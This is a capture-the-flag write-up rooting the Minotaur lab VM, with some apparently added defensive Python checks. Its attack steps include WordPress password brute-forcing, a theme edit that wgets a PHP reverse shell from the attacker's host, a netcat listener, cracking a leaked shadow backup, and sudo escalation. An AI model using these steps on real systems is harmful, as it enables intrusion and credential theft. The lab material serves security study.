Mess with the Bull, Get the Horn
Time to catch up with the SecTalks CTFs. First up, Minotaur (SecTalks BNE0x00).
"== Minotaur CTF ==
Minotaur is a boot2root CTF. Once you load the VM, treat it as a machine you can see on the network, i.e. you don't have physical access to this machine. Therefore, tricks like editing the VM's BIOS or Grub configuration are not allowed. Only remote attacks are permitted. There are a few flag.txt files around to grab. /root/flag.txt is your ultimate goal."
Let’s get hacking! First up, where is Minotaur hiding? Usually I would run arp or netdiscover to find the victim, but it isn’t broadcasting anything I can see. Let’s try a ping sweep:
```
root@omerta:~# nmap -sn 192.168.56.0/24
Starting Nmap 7.00 ( https://nmap.org ) at 2015-12-06 18:42 AEST
Nmap scan report for 192.168.56.1
Host is up (0.00014s latency).
MAC Address: 00:50:56:C0:00:09 (VMware)
Nmap scan report for 192.168.56.223
Host is up (0.00013s latency).
MAC Address: 00:0C:29:7C:CF:9E (VMware)
Nmap scan report for 192.168.56.254
Host is up (0.000079s latency).
MAC Address: 00:50:56:FC:11:C7 (VMware)
Nmap scan report for 192.168.56.130
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 15.20 seconds
```
Gotcha! What ports are open?
```
root@omerta:~# nmap -sT -n -Pn -A --script vuln -v 192.168.56.223
---snip---
Host is up (0.00043s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-cross-domain-policy: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-fileupload-exploiter:
|_http-frontpage-login: false
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
2020/tcp open  ftp     vsftpd 2.0.8 or later
---snip---
```
Let’s start with the low-hanging fruit: port 80.
Default Apache page. Time to break open the fuzz…
```
root@omerta:~# wfuzz -c -z file,/usr/share/dirb/wordlists/big.txt --hc 404 http://192.168.56.223/FUZZ
********************************************************
* Wfuzz 2.0 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.56.223/FUZZ
Payload type: file,/usr/share/dirb/wordlists/big.txt

Total requests: 20469
==================================================================
ID      Response   Lines      Word         Chars          Request
==================================================================

00012:  C=403     10 L       30 W          290 Ch        " - .htaccess"
00014:  C=403     10 L       30 W          290 Ch        " - .htpasswd"
03817:  C=301      9 L       28 W          314 Ch        " - bull"
16208:  C=403     10 L       30 W          294 Ch        " - server-status"
```
Looks like we have a webapp at /bull. Let’s take a look:
Ummm… “Bulls are majestic animals. Such muscular beasts make me quiver.” Ummm… yeh…. whatever floats your boat ;)
What gets me excited about the page is this: “Proudly powered by WordPress”. Time to scan for known WP vulnerabilities. I have removed the vuln descriptions to keep the output short.
```
root@omerta:~# wpscan -e p,t,u -u http://192.168.56.223/bull/
[!] Title: WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)
[!] Title: WordPress <= 4.2.3 - wp_untrash_post_comments SQL Injection
[!] Title: WordPress <= 4.2.3 - Timing Side Channel Attack
[!] Title: WordPress <= 4.2.3 - Widgets Title Cross-Site Scripting (XSS)
[!] Title: WordPress <= 4.2.3 - Nav Menu Title Cross-Site Scripting (XSS)
[!] Title: WordPress <= 4.2.3 - Legacy Theme Preview Cross-Site Scripting (XSS)
[!] Title: WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)
[!] Title: WordPress <= 4.3 - User List Table Cross-Site Scripting (XSS)
[!] Title: WordPress <= 4.3 - Publish Post and Mark as Sticky Permission Issue
[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
[!] Title: Slideshow Gallery < 1.4.7 Arbitrary File Upload
[!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS)
[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
    +----+-------+-------+
    | Id | Login | Name  |
    +----+-------+-------+
    | 1  | bully | bully |
    +----+-------+-------+
```
Plenty of vulnerabilities to check out, but first let’s see if we can go the easy route by bruteforcing bully’s password:
```
wpscan -u http://192.168.56.223/bull/ -U bully -w /usr/share/wordlists/rockyou.txt
```
I cancelled this bruteforce attempt as the dictionary attack was going to take far too long. Looking at the CTF notes, we have these hints:
== Hints ==
This CTF has a couple of fairly heavy password cracking challenges, and some red herrings.
One password you will need is not on rockyou.txt or any other wordlist you may have out there. So you need to think of a way to generate it yourself.
Let’s try generating our own dictionary file based on the website’s content:
```
root@omerta:~# cewl -m 4 -w minotaur_dict.txt http://192.168.56.223/bull/
CeWL 5.1 Robin Wood (robin@digi.ninja) (http://digi.ninja)
```
Take two, this time with a much smaller wordlist.
```
root@omerta:~# wpscan -u http://192.168.56.223/bull/ -U bully -w /root/minotaur_dict.txt
---snip---
  +----+-------+------+----------+
  | Id | Login | Name | Password |
  +----+-------+------+----------+
  |    | bully |      |          |
  +----+-------+------+----------+
---snip---
```
Still no joy… this is bullshit. ;) Let’s use john to mangle our dictionary file:
```
root@omerta:~# john --wordlist=minotaur_dict.txt --rules --stdout > minotaur_dict2.txt
Press 'q' or Ctrl-C to abort, almost any other key for status
18762p 0:00:00:00 100.00% (2015-12-06 20:20) 268028p/s Mailing
```
Third try at brute forcing:
```
root@omerta:~# wpscan -u http://192.168.56.223/bull/ -U bully -w /root/minotaur_dict2.txt
---snip---
  +----+-------+------+----------------+
  | Id | Login | Name | Password       |
  +----+-------+------+----------------+
  |    | bully |      | Bighornedbulls |
  +----+-------+------+----------------+
---snip---
```
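The defender's side of the cewl-then-john step above: an added Python example (not the author's tooling, nor part of the CTF) that expands words scraped from a site's own pages with a handful of john-style mangling rules and checks whether a chosen password is one of those variants. SITE_WORDS is a constructed sample, not CeWL's real output for the /bull page.

```python
"""Reject passwords that are simple manglings of a site's own public content.
This mimics what cewl + `john --rules` produce, so a password policy can catch
"Bighornedbulls" before an attacker's wordlist does.  Added example, not the
walkthrough's own code."""
import re

# Constructed sample of words a crawler like cewl -m 4 might pull from the site.
SITE_WORDS = ["bulls", "majestic", "animals", "muscular", "beasts",
              "quiver", "bighornedbulls", "wordpress"]


def mangle(word):
    """Variants from a small subset of john's default wordlist rules:
    as-is, capitalised, upper, lower, reversed, common suffixes, leetspeak."""
    base = {word, word.capitalize(), word.upper(), word.lower(), word[::-1]}
    out = set(base)
    for w in base:
        for suffix in ("1", "12", "123", "!", "2015"):
            out.add(w + suffix)
        out.add(w.replace("a", "@").replace("e", "3").replace("o", "0"))
    return out


def build_blocklist(words, min_len=4):
    """Expand every alphabetic scraped word of at least min_len characters."""
    block = set()
    for w in words:
        if len(w) >= min_len and re.fullmatch(r"[A-Za-z]+", w):
            block |= mangle(w)
    return block


def is_site_derived(password, words):
    """True if the password is a mangled form of a word from the site's content."""
    return password in build_blocklist(words)


if __name__ == "__main__":
    for pw in ("Bighornedbulls", "bulls123", "Tr0ub4dor&3"):
        verdict = "site-derived, reject" if is_site_derived(pw, SITE_WORDS) else "ok"
        print(f"{pw}: {verdict}")
```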
Much better! We now have a login to the WordPress site. Let’s see if we have edit privileges on the main index template:
We most certainly do. Time to add some exec code to download our PHP reverse shell.
```php
shell_exec("wget 192.168.56.130/phpshell.txt ; mv phpshell.txt phpshell.php");
```
After updating the index template, we set up a simple netcat listener on port 1337, visit the index page to upload our shell, and execute the shell by visiting http://192.168.56.223/bull/phpshell.php:
```
root@omerta:~# nc -nvlp 1337
listening on [any] 1337 ...
connect to [192.168.56.130] from (UNKNOWN) [192.168.56.223] 45286
Linux minotaur 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
 07:35:14 up  1:53,  0 users,  load average: 0.01, 2.53, 3.35
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami;id;uname -a
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Linux minotaur 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
$
```
w00t! First shell!
Taking a look at www-data’s default directory, we can see our first flag.txt!
```
$ ls
bull
flag.txt
index.html
$ ls -al
total 28
drwxr-xr-x 3 www-data www-data  4096 May 27  2015 .
drwxr-xr-x 3 root     root      4096 May 14  2015 ..
drwxr-xr-x 5 www-data www-data  4096 Dec  7 07:34 bull
-rw------- 1 www-data www-data    47 May 27  2015 flag.txt
-rw-r--r-- 1 www-data www-data 11510 May 14  2015 index.html
$ cat flag.txt
Oh, lookey here. A flag!
Th15 15 @N 3@5y f1@G!
```
Next step: let’s go to /tmp and download a simple script for automated enumeration. We can let this script run in the background while we search for unique or custom hacks.
```
$ cd /tmp
$ ls
```
Hang on a second! What do we have here?
```
flag.txt
shadow.bak
$ cat flag.txt
That shadow.bak file is probably useful, hey?
Also, you found a flag!
My m1L|<$|-|@|<3 br1|\|G$ @11 t3h b0y$ 2 t3h y@R|)
```
A second flag and a backup of the /etc/shadow file. It doesn’t get much better than this. Let’s use unshadow to generate our hash file, and pass it into john to see if we can get any creds:
```
root@omerta:~# unshadow passwd.txt shadow.txt > unshadow.txt
root@omerta:~# john unshadow.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Password1        (heffer)
obiwan6          (minotaur)
```
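A world-readable shadow.bak in /tmp is what made the cracking step possible, so here is the check a host-hardening script would run for it. This is an added Python example, not part of the walkthrough; the shadow line it plants uses a constructed placeholder hash, not one from the CTF box.

```python
"""Find world-readable files in scratch directories that contain shadow-format
password entries (user:$6$salt$hash:...).  Added example, not the CTF's code."""
import os
import re
import stat
import tempfile

# Constructed sha512crypt-style entry with a placeholder salt and hash.
SAMPLE_SHADOW = ("heffer:$6$PLACEHOLDERSALT$PLACEHOLDERHASHPLACEHOLDERHASHPLACEHOLDER"
                 ":16582:0:99999:7:::\n")

# user:$<id>$... where <id> is md5crypt, sha256crypt, sha512crypt, bcrypt or yescrypt.
SHADOW_LINE = re.compile(r"^[a-z_][a-z0-9_-]*:\$(?:1|5|6|2[aby]|y)\$[^:]*:")


def looks_like_shadow(path, max_bytes=65536):
    """True if any line in the file's head parses as a shadow(5) hash entry."""
    try:
        with open(path, "r", errors="replace") as f:
            head = f.read(max_bytes)
    except OSError:
        return False
    return any(SHADOW_LINE.match(line) for line in head.splitlines())


def world_readable(path):
    """Other-readable bit set, i.e. www-data could cat it like in the walkthrough."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def find_leaked_shadow(dirs):
    """Walk the given directories and return paths that are both readable
    by everyone and contain shadow-style hashes."""
    hits = []
    for d in dirs:
        for root, _, files in os.walk(d):
            for name in files:
                p = os.path.join(root, name)
                if world_readable(p) and looks_like_shadow(p):
                    hits.append(p)
    return hits


def demo():
    """Build a constructed /tmp-like directory holding a 0644 shadow.bak and a
    harmless flag.txt, then scan it.  Returns (hits, path_of_shadow_bak)."""
    d = tempfile.mkdtemp()
    bak = os.path.join(d, "shadow.bak")
    with open(bak, "w") as f:
        f.write(SAMPLE_SHADOW)
    os.chmod(bak, 0o644)
    with open(os.path.join(d, "flag.txt"), "w") as f:
        f.write("not a shadow file\n")
    return find_leaked_shadow([d]), bak
```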
After about one minute, we get heffer’s password. Let’s log on and see what we have:
```
root@omerta:~# ssh heffer@192.168.56.223
---snip---
heffer@minotaur:~$ ls -al
total 28
drwx------ 3 heffer heffer 4096 May 27  2015 .
drwxr-xr-x 5 root   root   4096 May 27  2015 ..
lrwxrwxrwx 1 heffer heffer    9 May 27  2015 .bash_history -> /dev/null
-rw-r--r-- 1 heffer heffer  220 May 27  2015 .bash_logout
-rw-r--r-- 1 heffer heffer 3637 May 27  2015 .bashrc
drwx------ 2 heffer heffer 4096 May 27  2015 .cache
-rw------- 1 heffer heffer  107 May 27  2015 flag.txt
-rw-r--r-- 1 heffer heffer  675 May 27  2015 .profile
```
Another flag! This time heffer’s:
```
heffer@minotaur:~$ cat flag.txt
So this was an easy flag to get, hopefully. Have you gotten ~minotaur/flag.txt yet?
Th3 fl@G 15: m00000 y0
```
The first thing I always do is check whether a user has sudo access, but in this case heffer has nothing exciting. I spent a couple of minutes pottering around the file system, only to be interrupted by john finding a second password, this time minotaur’s. Let’s see what minotaur has to offer:
```
heffer@minotaur:/home$ su - minotaur
Password:
minotaur@minotaur:~$ ls
flag.txt  peda
```
Minotaur’s flag!
```
minotaur@minotaur:~$ cat flag.txt
Congrats! You've found the first flag:
M355 W17H T3H 8ULL, G37 73H H0RN!

But can you get /root/flag.txt ?
```
Let’s check if minotaur has any sudo privileges:
```
minotaur@minotaur:~$ sudo -l
Matching Defaults entries for minotaur on minotaur:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User minotaur may run the following commands on minotaur:
    (root) NOPASSWD: /root/bullquote.sh
    (ALL : ALL) ALL
```
ALL : ALL… hello! Today is our lucky day.
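The `(ALL : ALL) ALL` line is the kind of entry a sudoers audit should flag before anyone types `sudo bash`. Added Python example, not the walkthrough's own tooling: it parses the `sudo -l` output shown above (embedded as a constructed sample) and reports entries that grant unrestricted root or skip the password prompt.

```python
"""Audit `sudo -l` output for over-broad grants.  Added example, not the CTF's
code; SUDO_L_OUTPUT is the walkthrough's output embedded as a sample."""
import re

SUDO_L_OUTPUT = r"""Matching Defaults entries for minotaur on minotaur:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User minotaur may run the following commands on minotaur:
    (root) NOPASSWD: /root/bullquote.sh
    (ALL : ALL) ALL
"""

# "(runas_user : runas_group) TAG: TAG: command"  -- tags such as NOPASSWD are optional.
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")


def parse_sudo_l(text):
    """Return (user, [(runas, [tags], command), ...]) from `sudo -l` output."""
    user, entries, in_cmds = None, [], False
    for line in text.splitlines():
        m = re.match(r"User (\S+) may run the following commands", line)
        if m:
            user, in_cmds = m.group(1), True
            continue
        if in_cmds:
            m = ENTRY_RE.match(line)
            if m:
                tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
                entries.append((m.group("runas"), tags, m.group("cmd")))
    return user, entries


def audit(text):
    """Flag entries that hand out unrestricted root or skip the password prompt.
    A bare ALL command still prompts for the user's own password (as the
    walkthrough's `sudo bash` does), but that password was just cracked from
    a leaked shadow file, so the prompt is no real barrier."""
    user, entries = parse_sudo_l(text)
    findings = []
    for runas, tags, cmd in entries:
        if cmd == "ALL":
            findings.append(f"{user}: unrestricted sudo ({runas}) ALL")
        if "NOPASSWD" in tags:
            findings.append(f"{user}: NOPASSWD for {cmd} as ({runas})")
    return findings


if __name__ == "__main__":
    for finding in audit(SUDO_L_OUTPUT):
        print("[!]", finding)
```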
```
minotaur@minotaur:~$ sudo bash
[sudo] password for minotaur:
root@minotaur:~# whoami;id;uname -a
root
uid=0(root) gid=0(root) groups=0(root)
Linux minotaur 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
```
We have rooted the minotaur! Let’s raise the flag…
```
root@minotaur:/root# cat flag.txt
Congrats! You got the final flag!
Th3 Fl@g is: 5urr0nd3d bY @r$3h0l35
```
Thanks Bull for a fun challenge and for helping to get the Brisbane SecTalks off the ground.
Until next time, tight lines and happy hacking.